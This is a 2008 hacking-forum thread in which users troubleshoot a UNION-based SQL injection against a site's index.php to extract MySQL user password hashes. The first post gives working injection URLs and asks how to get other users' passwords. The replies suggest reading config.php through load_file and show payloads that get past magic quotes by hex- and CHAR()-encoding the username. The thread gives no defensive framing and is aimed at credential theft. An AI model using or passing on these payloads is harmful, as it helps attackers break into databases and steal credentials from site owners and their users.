|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
sql injection problem [please help] |
|
Posted: Tue Jul 08, 2008 3:58 pm |
|
|
x3roconf_ |
Advanced user |
|
|
Joined: May 01, 2008 |
Posts: 101 |
|
|
|
|
|
|
|
index.php?action=detail&id=-999 union all select 1,password,3,4,5,6,7,8,9,10 from mysql.user WHERE user="user2"/*
causes syntax error.. [You have an error in your SQL syntax] WHY?
BUT
index.php?action=detail&id=-999 union all select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10 from mysql.user/* WORKS
How i can find passwords for other users (other than root)? |
|
|
|
|
|
Re: sql injection problem [please help] |
|
Posted: Sun Aug 17, 2008 5:28 pm |
|
|
3rraz |
Beginner |
|
|
Joined: Aug 17, 2008 |
Posts: 3 |
|
|
|
|
|
|
|
x3roconf_ wrote: | index.php?action=detail&id=-999 union all select 1,password,3,4,5,6,7,8,9,10 from mysql.user WHERE user="user2"/*
causes syntax error.. [You have an error in your SQL syntax] WHY?
BUT
index.php?action=detail&id=-999 union all select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10 from mysql.user/* WORKS
How i can find passwords for other users (other than root)? |
just mess around with it, try it without the quotes.
try to use load_file and load a config.php file, if the mysql user has permissions to read files. |
|
|
|
|
|
|
|
|
Posted: Sun Aug 17, 2008 7:32 pm |
|
|
cO2_dz |
Regular user |
|
|
Joined: Aug 12, 2008 |
Posts: 10 |
Location: Algeria |
|
|
|
|
|
|
Hi,
Maybe, can you see like this one \"users2\"/* in your error SQL ?
It's magic quotes problem, For bypass it , You must encoding ur 'USER' to hex() or char() ,
Code: | id=1+AND+1=0+union+all+select+0,password,0,0,0,0,0,0,0,0+from+mysql.user+WHERE+user=0x726f6f74/* |
Code: | id=1+AND+1=0+union+all+select+0,password,0,0,0,0,0,0,0,0+from+mysql.user+WHERE+user=CHAR(114),CHAR(111),CHAR(111),CHAR(116)/* |
Sql Char Encoder URL : http://www.waraxe.us/sql-char-encoder.html
All my respect
/cO2 |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|